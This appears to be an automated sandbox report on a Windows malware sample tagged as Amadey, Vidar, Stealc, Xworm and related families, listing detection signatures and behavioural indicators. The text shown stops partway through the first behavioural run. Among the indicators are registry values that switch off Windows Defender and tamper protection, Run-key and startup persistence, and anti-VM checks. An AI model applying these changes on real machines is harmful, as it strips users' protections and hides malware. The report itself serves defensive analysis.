Malware Analysis Report

2025-04-03 09:27

Sample ID 250305-2dtlwa1tat
Target d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
SHA256 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
Tags
amadey healer litehttp stealc systembc vidar xworm 092155 ir7am trump bot defense_evasion discovery dropper evasion execution persistence rat spyware stealer trojan credential_access
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e

Threat Level: Known bad

The file d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e was found to be: Known bad.

Malicious Activity Summary

amadey healer litehttp stealc systembc vidar xworm 092155 ir7am trump bot defense_evasion discovery dropper evasion execution persistence rat spyware stealer trojan credential_access

Detects Healer an antivirus disabler dropper

Detect Vidar Stealer

Modifies Windows Defender DisableAntiSpyware settings

Litehttp family

Xworm family

Amadey

Detect Xworm Payload

Healer family

Modifies Windows Defender notification settings

Stealc family

Modifies Windows Defender Real-time Protection settings

Healer

SystemBC

Systembc family

Xworm

LiteHTTP

Amadey family

Modifies Windows Defender TamperProtection settings

Vidar family

Vidar

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks BIOS information in registry

Reads data files stored by FTP clients

.NET Reactor protector

Checks computer location settings

Unsecured Credentials: Credentials In Files

Reads user/profile data of web browsers

Identifies Wine through registry keys

Loads dropped DLL

Reads user/profile data of local email clients

Drops startup file

Windows security modification

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Enumerates processes with tasklist

Suspicious use of SetThreadContext

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Browser Information Discovery

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Program crash

Unsigned PE

Modifies registry class

Scheduled Task/Job: Scheduled Task

Checks processor information in registry

Suspicious use of SendNotifyMessage

Delays execution with timeout.exe

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-03-05 22:28

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-03-05 22:28

Reported

2025-03-05 22:30

Platform

win7-20240903-en

Max time kernel

146s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Stealc

stealer stealc

Stealc family

stealc

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107290101\ktxzLhN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107320101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107390101\63f1932a62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107430101\cnntXtU.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107410101\41108e652a.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\10107400101\8e275fbb94.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\69c80032ec.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107380101\\69c80032ec.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\63f1932a62.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107390101\\63f1932a62.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\8e275fbb94.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107400101\\8e275fbb94.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\8QpbZ8u9\\Anubis.exe\"" C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\460d9c14c9.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107370101\\460d9c14c9.exe" C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\rapes.job C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe N/A
